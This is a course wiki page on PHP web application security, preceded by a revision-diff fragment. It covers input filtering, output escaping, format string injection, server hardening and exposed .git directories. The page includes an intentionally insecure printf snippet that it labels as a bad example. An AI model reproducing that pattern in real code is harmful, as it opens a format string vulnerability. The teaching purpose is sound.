* [http://www.zdnet.com/blog/security/3-million-bank-accounts-hacked-in-iran/11577 Iranian Banks, April 2012 (information leakage)]
 
* [http://www.zdnet.com/blog/security/hacker-steals-chinese-government-defense-contracts/11386 Chinese Department of Defense, April 2012 (information leakage)]
 
* [http://articles.chicagotribune.com/2012-04-04/news/sns-rt-us-usa-hackers-utahbre83404g-20120404_1_data-security-breach-cyber-attack-hackers Utah Medicaid, April 2012]
 
  
 
== Server Configurations ==
 
== Server Configurations ==
Line 590: Line 106:
 
* Use a firewall system to block unnecessary ports from public access.  SSH and Web Server should really be the only ports you need.  You should keep the web serve on port 80, but you have the option of moving SSH to a port other than 22 to make it slightly more secure.
 
* Use a firewall system to block unnecessary ports from public access.  SSH and Web Server should really be the only ports you need.  You should keep the web serve on port 80, but you have the option of moving SSH to a port other than 22 to make it slightly more secure.
  
=== Real-Life Examples ===
+
=== Git Exposed ===
 
 
* [http://news.techeye.net/internet/4chan-vandalises-tea-party-website-reveals-private-donors Independence Hall Tea Party PAC, May 2012 (their root password was "p9ssw0rd")]
 
  
TODO: Get video from http://fileice.net/download.php?file=r426
+
Another thing to keep in mind is that by default, Apache serves up ''everything'' in your file tree, only except for Apache-specific configuration files like .htaccess.  This means that if you're not careful, your .git directory can be served, exposing attackers to your raw source code, including things like database passwords! A recent study found that [http://www.jamiembrown.com/blog/one-in-every-600-websites-has-git-exposed/ one in every 600 web sites is making this mistake]. Don't be one of them!
  
  
 
[[Category:Module 2]]
 
[[Category:Module 2]]
 +
[[Category:Web Application Security]]

Latest revision as of 21:05, 18 July 2018

Application-level web security is of increasing concern among web developers. This article outlines some types of security threats to your web application and how to solve those threats.

This is Part 1 of the Web Application Security article, geared toward the material covered in Module 2. For material covered in Module 3 (MySQL), see Web Application Security, Part 2. For material covered in Module 6 (JavaScript), see Web Application Security, Part 3.

Introduction to Application-Level Web Security

Every day, computer hackers around the world penetrate web applications, often for personal profits. You may find it hard to believe, but even high-profile web sites (banks, social media, even computer security companies) are vulnerable to application-level attacks!

Not only is it embarrassing to be the programmer who wrote the vulnerable code, but it could also cost you your job. As a prudent web developer, it is imperative that you take precautionary measures to make your application difficult to penetrate. Indeed, most of the time, if your site is well-written, hackers will just move on.

Here's the golden rule: Anything in your site that accepts user input, whether via a form, an AJAX request, a file upload, or even malformed links, can be used as an attack vector. NEVER TRUST USER INPUT!!! This can be summarized in the acronym FIEO, or Filter Input, Escape Output.

FIEO in PHP

Filtering Input

"Filter Input" means that you should check that input data is of the format that you are expecting. For example, if you are expecting a number, you should cast it to a float or an int. If you are expecting a phone number, you should run it through a regular expression (you will learn regular expressions in module 4). For example:

<?php
// Cast a number to a float or an int:
$amount = (float) $_POST['amount'];

// Pass a phone number through a regular expression:
$phone = preg_match('/\d{3}-\d{3}-\d{4}/', $_POST['phone']) ? $_POST['phone'] : "";
?>

Escaping Output

"Escape Output" means that you need to nullify, or escape, characters that have special meaning in the markup language of interest. For example, consider the following string:

If a<b and b<c then a<c.

Since a less-than sign means the start of a tag in HTML, and b is a valid tag name, the above string will not render as you might expect in HTML. Therefore, we need to escape our less-than signs by using HTML entities:

If a&lt;b and b&lt;c then a&lt;c.

The "<" is an HTML entity that will render as a less-than sign. (For more information on HTML entities, read this article on the WebPlatform wiki.)

PHP provides a function that, given a string, will convert special characters to their HTML entity equivalents.

<?php
$str = "If a<b and b<c then a<c.";

// Convert special characters to HTML entities before outputting:
echo htmlentities($str);
?>

Note: htmlentities escapes a string for use in HTML, but it does not escape a string for use in other markup languages. You need to use different methods when escaping strings for other languages.

Why Not to Escape Input

Filtering your input is important, as shown above. However, it is bad practice to escape your input. For example, don't do this:

<?php
$message = htmlentites($_POST['amount']); // bad practice
// then store $message in a database, etc.
?>

The reason this is bad practice is that it permanently ties that string to its final output format. For example, what if some time down the road you want to support display of that message in a PDF? You'd need to go back and remove all the HTML entities again.

This is why you should filter strings at the input stage but not escape them until the final output stage.

Format String Injection

If you like using functions like printf and sprintf, you may find yourself writing

printf( "%s", htmlentities($_GET['username']) ); // good example

It is tempting to reduce this to

printf( htmlentities($_GET['username']) ); // BAD example

Although the second implementation will work for most usernames, it is not correct! You are essentially making the client-provided username the format string for printf. If the username contains any percentage sign (%), it will be interpreted as the start of a parameter in the format string, causing your script to return errors. Worse yet, it is known that certain combinations of format parameters will actually reveal system information in the error log.

Solution

The solution is simple: never put dynamic input as the format string. It should always be static, either hard-coded or from a stable source like a YAML file. User-supplied input should always be fed into the string as arguments to sprintf and printf.

If you are outputting only one little string like in the example above, it suffices to use a PHP function like print or echo:

print htmlentities($_GET['username']); // good example
echo htmlentities($_GET['username']); // good example

Server Configurations

Sometimes hackers attempt to penetrate your application from the server side rather than the application side. Server-side security is beyond the realm of this course, but here are some things you should keep in mind.

  • Use a highly secure root password, and it should be one that you don't use anywhere else. Seriously.
  • Use a firewall system to block unnecessary ports from public access. SSH and Web Server should really be the only ports you need. You should keep the web serve on port 80, but you have the option of moving SSH to a port other than 22 to make it slightly more secure.

Git Exposed

Another thing to keep in mind is that by default, Apache serves up everything in your file tree, only except for Apache-specific configuration files like .htaccess. This means that if you're not careful, your .git directory can be served, exposing attackers to your raw source code, including things like database passwords! A recent study found that one in every 600 web sites is making this mistake. Don't be one of them!